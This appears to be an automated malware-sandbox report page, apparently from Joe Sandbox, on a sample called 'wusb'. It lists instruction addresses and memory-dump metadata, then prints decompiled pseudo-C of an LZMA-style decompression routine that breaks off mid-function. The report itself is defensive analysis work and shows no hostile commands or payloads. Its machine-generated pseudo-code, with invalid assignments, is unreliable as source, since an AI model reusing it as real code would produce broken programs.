                                                        0x004069a8
                                                        0x004069ab
                                                        0x004069ae
                                                        0x004069b1
                                                        0x004069b3
                                                        0x004069b3
                                                        0x004069b3
                                                        0x004069b6
                                                        0x004069b9
                                                        0x004069bb
                                                        0x004069bc
                                                        0x004069bf
                                                        0x00000000
                                                        0x004069bf
                                                        0x00000000
                                                        0x00406bf5
                                                        0x00406bf9
                                                        0x00406c17
                                                        0x00406c1a
                                                        0x00406c21
                                                        0x00406c24
                                                        0x00406c27
                                                        0x00406c2a
                                                        0x00406c2d
                                                        0x00406c30
                                                        0x00406c32
                                                        0x00406c39
                                                        0x00406c3a
                                                        0x00406c3c
                                                        0x00406c3f
                                                        0x00406c42
                                                        0x00406c45
                                                        0x00406c45
                                                        0x00406c4a
                                                        0x00000000
                                                        0x00406c4a
                                                        0x00406bfb
                                                        0x00406bfe
                                                        0x00406c01
                                                        0x00406c0b
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00406c5f
                                                        0x00406c63
                                                        0x00406c86
                                                        0x00406c89
                                                        0x00406c8c
                                                        0x00406c96
                                                        0x00406c65
                                                        0x00406c65
                                                        0x00406c68
                                                        0x00406c6b
                                                        0x00406c6e
                                                        0x00406c7b
                                                        0x00406c7e
                                                        0x00406c7e
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00406ca2
                                                        0x00406ca6
                                                        0x00000000
                                                        0x00000000
                                                        0x00406cac
                                                        0x00406cb0
                                                        0x00000000
                                                        0x00000000
                                                        0x00406cb6
                                                        0x00406cb8
                                                        0x00406cbc
                                                        0x00406cbc
                                                        0x00406cbf
                                                        0x00406cc3
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d3a
                                                        0x00406d3e
                                                        0x00406d45
                                                        0x00406d48
                                                        0x00406d4b
                                                        0x00406d40
                                                        0x00406d40
                                                        0x00406d40
                                                        0x00406d4e
                                                        0x00406d51
                                                        0x00000000
                                                        0x00000000
                                                        0x00406dfa
                                                        0x00406dfa
                                                        0x00406dfe
                                                        0x0040719c
                                                        0x00000000
                                                        0x0040719c
                                                        0x00406e04
                                                        0x00406e07
                                                        0x00406e0a
                                                        0x00406e0e
                                                        0x00406e11
                                                        0x00406e17
                                                        0x00406e19
                                                        0x00406e19
                                                        0x00406e19
                                                        0x00406e1c
                                                        0x00406e1f
                                                        0x00000000
                                                        0x00000000
                                                        0x004069ef
                                                        0x004069ef
                                                        0x004069f3
                                                        0x00407160
                                                        0x00000000
                                                        0x00407160
                                                        0x004069f9
                                                        0x004069fc
                                                        0x004069ff
                                                        0x00406a03
                                                        0x00406a06
                                                        0x00406a0c
                                                        0x00406a0e
                                                        0x00406a0e
                                                        0x00406a0e
                                                        0x00406a11
                                                        0x00406a14
                                                        0x00406a14
                                                        0x00406a17
                                                        0x00406a1a
                                                        0x00000000
                                                        0x00000000
                                                        0x00406a20
                                                        0x00406a26
                                                        0x00000000
                                                        0x00000000
                                                        0x00406a2c
                                                        0x00406a2c
                                                        0x00406a30
                                                        0x00406a33
                                                        0x00406a36
                                                        0x00406a39
                                                        0x00406a3c
                                                        0x00406a3d
                                                        0x00406a40
                                                        0x00406a42
                                                        0x00406a48
                                                        0x00406a4b
                                                        0x00406a4e
                                                        0x00406a51
                                                        0x00406a54
                                                        0x00406a57
                                                        0x00406a5a
                                                        0x00406a76
                                                        0x00406a79
                                                        0x00406a7c
                                                        0x00406a7f
                                                        0x00406a86
                                                        0x00406a8a
                                                        0x00406a8c
                                                        0x00406a90
                                                        0x00406a5c
                                                        0x00406a5c
                                                        0x00406a60
                                                        0x00406a68
                                                        0x00406a6d
                                                        0x00406a6f
                                                        0x00406a71
                                                        0x00406a71
                                                        0x00406a93
                                                        0x00406a9a
                                                        0x00406a9d
                                                        0x00000000
                                                        0x00406aa3
                                                        0x00000000
                                                        0x00406aa3
                                                        0x00000000
                                                        0x00406aa8
                                                        0x00406aa8
                                                        0x00406aac
                                                        0x0040716c
                                                        0x00000000
                                                        0x0040716c
                                                        0x00406ab2
                                                        0x00406ab5
                                                        0x00406ab8
                                                        0x00406abc
                                                        0x00406abf
                                                        0x00406ac5
                                                        0x00406ac7
                                                        0x00406ac7
                                                        0x00406ac7
                                                        0x00406aca
                                                        0x00406acd
                                                        0x00406acd
                                                        0x00406acd
                                                        0x00406ad3
                                                        0x00000000
                                                        0x00000000
                                                        0x00406ad5
                                                        0x00406ad8
                                                        0x00406adb
                                                        0x00406ade
                                                        0x00406ae1
                                                        0x00406ae4
                                                        0x00406ae7
                                                        0x00406aea
                                                        0x00406aed
                                                        0x00406af0
                                                        0x00406af3
                                                        0x00406b0b
                                                        0x00406b0e
                                                        0x00406b11
                                                        0x00406b14
                                                        0x00406b14
                                                        0x00406b17
                                                        0x00406b1b
                                                        0x00406b1d
                                                        0x00406af5
                                                        0x00406af5
                                                        0x00406afd
                                                        0x00406b02
                                                        0x00406b04
                                                        0x00406b06
                                                        0x00406b06
                                                        0x00406b20
                                                        0x00406b27
                                                        0x00406b2a
                                                        0x00000000
                                                        0x00406b2c
                                                        0x00000000
                                                        0x00406b2c
                                                        0x00406b2a
                                                        0x00406b31
                                                        0x00406b31
                                                        0x00406b31
                                                        0x00406b31
                                                        0x00000000
                                                        0x00000000
                                                        0x00406b6c
                                                        0x00406b6c
                                                        0x00406b70
                                                        0x00407178
                                                        0x00000000
                                                        0x00407178
                                                        0x00406b76
                                                        0x00406b79
                                                        0x00406b7c
                                                        0x00406b80
                                                        0x00406b83
                                                        0x00406b89
                                                        0x00406b8b
                                                        0x00406b8b
                                                        0x00406b8b
                                                        0x00406b8e
                                                        0x00406b91
                                                        0x00406b91
                                                        0x00406b97
                                                        0x00406b35
                                                        0x00406b35
                                                        0x00406b38
                                                        0x00000000
                                                        0x00406b38
                                                        0x00406b99
                                                        0x00406b99
                                                        0x00406b9c
                                                        0x00406b9f
                                                        0x00406ba2
                                                        0x00406ba5
                                                        0x00406ba8
                                                        0x00406bab
                                                        0x00406bae
                                                        0x00406bb1
                                                        0x00406bb4
                                                        0x00406bb7
                                                        0x00406bcf
                                                        0x00406bd2
                                                        0x00406bd5
                                                        0x00406bd8
                                                        0x00406bd8
                                                        0x00406bdb
                                                        0x00406bdf
                                                        0x00406be1
                                                        0x00406bb9
                                                        0x00406bb9
                                                        0x00406bc1
                                                        0x00406bc6
                                                        0x00406bc8
                                                        0x00406bca
                                                        0x00406bca
                                                        0x00406be4
                                                        0x00406beb
                                                        0x00406bee
                                                        0x00000000
                                                        0x00406bf0
                                                        0x00000000
                                                        0x00406bf0
                                                        0x00000000
                                                        0x00406e7d
                                                        0x00406e7d
                                                        0x00406e81
                                                        0x004071a8
                                                        0x00000000
                                                        0x004071a8
                                                        0x00406e87
                                                        0x00406e8a
                                                        0x00406e8d
                                                        0x00406e91
                                                        0x00406e94
                                                        0x00406e9a
                                                        0x00406e9c
                                                        0x00406e9c
                                                        0x00406e9c
                                                        0x00406e9f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f8c
                                                        0x00406f90
                                                        0x00406fb2
                                                        0x00406fb5
                                                        0x00406fbf
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00406f92
                                                        0x00406f95
                                                        0x00406f99
                                                        0x00406f9c
                                                        0x00406f9c
                                                        0x00406f9f
                                                        0x00000000
                                                        0x00000000
                                                        0x00407049
                                                        0x0040704d
                                                        0x0040706b
                                                        0x0040706b
                                                        0x0040706b
                                                        0x00407072
                                                        0x00407079
                                                        0x00407080
                                                        0x00407080
                                                        0x00000000
                                                        0x00407080
                                                        0x0040704f
                                                        0x00407052
                                                        0x00407055
                                                        0x00407058
                                                        0x0040705f
                                                        0x00406fa3
                                                        0x00406fa3
                                                        0x00406fa6
                                                        0x00000000
                                                        0x00000000
                                                        0x0040713a
                                                        0x0040713d
                                                        0x0040703e
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d74
                                                        0x00406d76
                                                        0x00406d7d
                                                        0x00406d7e
                                                        0x00406d80
                                                        0x00406d83
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d8b
                                                        0x00406d8e
                                                        0x00406d91
                                                        0x00406d93
                                                        0x00406d95
                                                        0x00406d95
                                                        0x00406d96
                                                        0x00406d99
                                                        0x00406da0
                                                        0x00406da3
                                                        0x00406db1
                                                        0x00000000
                                                        0x00000000
                                                        0x00407087
                                                        0x00407087
                                                        0x0040708a
                                                        0x00407091
                                                        0x00000000
                                                        0x00000000
                                                        0x00407096
                                                        0x00407096
                                                        0x0040709a
                                                        0x004071d2
                                                        0x00000000
                                                        0x004071d2
                                                        0x004070a0
                                                        0x004070a3
                                                        0x004070a6
                                                        0x004070aa
                                                        0x004070ad
                                                        0x004070b3
                                                        0x004070b5
                                                        0x004070b5
                                                        0x004070b5
                                                        0x004070b8
                                                        0x004070bb
                                                        0x004070bb
                                                        0x004070bb
                                                        0x004070bb
                                                        0x004070be
                                                        0x004070be
                                                        0x004070c2
                                                        0x00407122
                                                        0x00407125
                                                        0x0040712a
                                                        0x0040712b
                                                        0x0040712d
                                                        0x0040712f
                                                        0x00407132
                                                        0x0040703e
                                                        0x0040703e
                                                        0x00000000
                                                        0x00407044
                                                        0x0040703e
                                                        0x004070c4
                                                        0x004070ca
                                                        0x004070cd
                                                        0x004070d0
                                                        0x004070d3
                                                        0x004070d6
                                                        0x004070d9
                                                        0x004070dc
                                                        0x004070df
                                                        0x004070e2
                                                        0x004070e5
                                                        0x004070fe
                                                        0x00407101
                                                        0x00407104
                                                        0x00407107
                                                        0x0040710b
                                                        0x0040710d
                                                        0x0040710d
                                                        0x0040710e
                                                        0x00407111
                                                        0x004070e7
                                                        0x004070e7
                                                        0x004070ef
                                                        0x004070f4
                                                        0x004070f6
                                                        0x004070f9
                                                        0x004070f9
                                                        0x00407114
                                                        0x0040711b
                                                        0x00000000
                                                        0x0040711d
                                                        0x00000000
                                                        0x0040711d
                                                        0x00000000
                                                        0x00406db9
                                                        0x00406dbc
                                                        0x00406df2
                                                        0x00406f22
                                                        0x00406f22
                                                        0x00406f22
                                                        0x00406f22
                                                        0x00406f25
                                                        0x00406f25
                                                        0x00406f28
                                                        0x00406f2a
                                                        0x004071b4
                                                        0x00000000
                                                        0x004071b4
                                                        0x00406f30
                                                        0x00406f33
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f39
                                                        0x00406f3d
                                                        0x00406f40
                                                        0x00406f40
                                                        0x00406f40
                                                        0x00000000
                                                        0x00406f40
                                                        0x00406dbe
                                                        0x00406dc0
                                                        0x00406dc2
                                                        0x00406dc4
                                                        0x00406dc7
                                                        0x00406dc8
                                                        0x00406dca
                                                        0x00406dcc
                                                        0x00406dcf
                                                        0x00406dd2
                                                        0x00406de8
                                                        0x00406ded
                                                        0x00406e25
                                                        0x00406e25
                                                        0x00406e29
                                                        0x00406e55
                                                        0x00406e57
                                                        0x00406e5e
                                                        0x00406e61
                                                        0x00406e64
                                                        0x00406e64
                                                        0x00406e69
                                                        0x00406e69
                                                        0x00406e6b
                                                        0x00406e6e
                                                        0x00406e75
                                                        0x00406e78
                                                        0x00406ea5
                                                        0x00406ea5
                                                        0x00406ea8
                                                        0x00406eab
                                                        0x00406f1f
                                                        0x00406f1f
                                                        0x00406f1f
                                                        0x00000000
                                                        0x00406f1f
                                                        0x00406ead
                                                        0x00406eb3
                                                        0x00406eb6
                                                        0x00406eb9
                                                        0x00406ebc
                                                        0x00406ebf
                                                        0x00406ec2
                                                        0x00406ec5
                                                        0x00406ec8
                                                        0x00406ecb
                                                        0x00406ece
                                                        0x00406ee7
                                                        0x00406ee9
                                                        0x00406eec
                                                        0x00406eed
                                                        0x00406ef0
                                                        0x00406ef2
                                                        0x00406ef5
                                                        0x00406ef7
                                                        0x00406ef9
                                                        0x00406efc
                                                        0x00406efe
                                                        0x00406f01
                                                        0x00406f05
                                                        0x00406f07
                                                        0x00406f07
                                                        0x00406f08
                                                        0x00406f0b
                                                        0x00406f0e
                                                        0x00406ed0
                                                        0x00406ed0
                                                        0x00406ed8
                                                        0x00406edd
                                                        0x00406edf
                                                        0x00406ee2
                                                        0x00406ee2
                                                        0x00406f11
                                                        0x00406f18
                                                        0x00406ea2
                                                        0x00406ea2
                                                        0x00406ea2
                                                        0x00406ea2
                                                        0x00000000
                                                        0x00406f1a
                                                        0x00000000
                                                        0x00406f1a
                                                        0x00406f18
                                                        0x00406e2b
                                                        0x00406e2e
                                                        0x00406e30
                                                        0x00406e33
                                                        0x00406e36
                                                        0x00406e39
                                                        0x00406e3b
                                                        0x00406e3e
                                                        0x00406e41
                                                        0x00406e41
                                                        0x00406e44
                                                        0x00406e44
                                                        0x00406e47
                                                        0x00406e4e
                                                        0x00406e22
                                                        0x00406e22
                                                        0x00406e22
                                                        0x00406e22
                                                        0x00000000
                                                        0x00406e50
                                                        0x00000000
                                                        0x00406e50
                                                        0x00406e4e
                                                        0x00406dd4
                                                        0x00406dd7
                                                        0x00406dd9
                                                        0x00406ddc
                                                        0x00000000
                                                        0x00000000
                                                        0x00406b3b
                                                        0x00406b3b
                                                        0x00406b3f
                                                        0x00407184
                                                        0x00000000
                                                        0x00407184
                                                        0x00406b45
                                                        0x00406b48
                                                        0x00406b4b
                                                        0x00406b4e
                                                        0x00406b51
                                                        0x00406b54
                                                        0x00406b57
                                                        0x00406b59
                                                        0x00406b5c
                                                        0x00406b5f
                                                        0x00406b62
                                                        0x00406b64
                                                        0x00406b64
                                                        0x00406b64
                                                        0x00000000
                                                        0x00000000
                                                        0x00406cc6
                                                        0x00406cc6
                                                        0x00406cca
                                                        0x00407190
                                                        0x00000000
                                                        0x00407190
                                                        0x00406cd0
                                                        0x00406cd3
                                                        0x00406cd6
                                                        0x00406cd9
                                                        0x00406cdb
                                                        0x00406cdb
                                                        0x00406cdb
                                                        0x00406cde
                                                        0x00406ce1
                                                        0x00406ce4
                                                        0x00406ce7
                                                        0x00406cea
                                                        0x00406ced
                                                        0x00406cee
                                                        0x00406cf0
                                                        0x00406cf0
                                                        0x00406cf0
                                                        0x00406cf3
                                                        0x00406cf6
                                                        0x00406cf9
                                                        0x00406cfc
                                                        0x00406cfc
                                                        0x00406cfc
                                                        0x00406cff
                                                        0x00406d01
                                                        0x00406d01
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f43
                                                        0x00406f43
                                                        0x00406f43
                                                        0x00406f47
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f4d
                                                        0x00406f50
                                                        0x00406f53
                                                        0x00406f56
                                                        0x00406f58
                                                        0x00406f58
                                                        0x00406f58
                                                        0x00406f5b
                                                        0x00406f5e
                                                        0x00406f61
                                                        0x00406f64
                                                        0x00406f67
                                                        0x00406f6a
                                                        0x00406f6b
                                                        0x00406f6d
                                                        0x00406f6d
                                                        0x00406f6d
                                                        0x00406f70
                                                        0x00406f73
                                                        0x00406f76
                                                        0x00406f79
                                                        0x00406f7c
                                                        0x00406f80
                                                        0x00406f82
                                                        0x00406f85
                                                        0x00000000
                                                        0x00406f87
                                                        0x00406d04
                                                        0x00406d04
                                                        0x00000000
                                                        0x00406d04
                                                        0x00406f85
                                                        0x004071ba
                                                        0x00000000
                                                        0x00000000
                                                        0x004067e9
                                                        0x004071f1
                                                        0x004071f1
                                                        0x00000000
                                                        0x004071f1
                                                        0x0040703e
                                                        0x00406fc5
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00406d17

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b6213b912aa4c06ba450cadc729dd6194a23a0bdabbae65cbac8743ad0304bd8
                                                        • Instruction ID: 95b660950287b107d15ca963a4456fab735294b344fdd2f3256912a70e30144d
                                                        • Opcode Fuzzy Hash: b6213b912aa4c06ba450cadc729dd6194a23a0bdabbae65cbac8743ad0304bd8
                                                        • Instruction Fuzzy Hash: A4713371E04228DBDF28CF98C844BADBBB1FF44305F15806AD856BB280C7789996DF45
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00406C5F Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 98%
                                                        			E00406C5F() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004071F9))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4)); // executed
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
